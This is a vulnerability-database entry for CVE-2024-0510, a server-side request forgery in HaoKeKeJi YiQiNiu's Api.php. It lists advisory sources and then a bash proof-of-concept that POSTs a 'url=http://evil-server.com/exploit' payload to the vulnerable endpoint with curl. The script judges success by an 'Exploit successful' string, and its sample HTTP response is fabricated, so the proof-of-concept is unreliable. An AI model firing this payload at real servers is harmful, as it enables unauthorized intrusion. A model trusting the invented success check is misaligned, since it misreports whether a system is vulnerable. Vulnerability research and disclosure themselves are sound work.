| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-0510 | 13 Jan 202423:26 | – | circl | |
| HaoKeKeJi YiQiNiu Code Issue Vulnerability | 13 Jan 202400:00 | – | cnnvd | |
| CVE-2024-0510 | 13 Jan 202422:00 | – | cve | |
| CVE-2024-0510 HaoKeKeJi YiQiNiu Api.php http_post server-side request forgery | 13 Jan 202422:00 | – | cvelist | |
| EUVD-2024-16305 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-0510 | 13 Jan 202422:15 | – | nvd | |
| CVE-2024-0510 | 13 Jan 202422:15 | – | osv | |
| Server side request forgery (ssrf) | 13 Jan 202422:15 | – | prion | |
| PT-2024-15626 · Unknown · Haokekeji Yiqiniu | 13 Jan 202400:00 | – | ptsecurity | |
| CVE-2024-0510 | 4 Feb 202523:05 | – | redhatcve |
`#!/bin/bash
# Set target URL and payload
target_url="http://example.com/application/pay/controller/Api.php"
payload="url=http://evil-server.com/exploit"
# Send the malicious request
response=$(curl -s -X POST -d "$payload" "$target_url")
# Check if the exploit was successful
if echo "$response" | grep -q "Exploit successful"; then
echo "Exploit succeeded"
else
echo "Exploit failed"
fi
# Example payload and response
payload="url=http://evil-server.com/exploit"
response="HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Dec 2024 20:23:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 25
Connection: keep-alive
Exploit successful"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation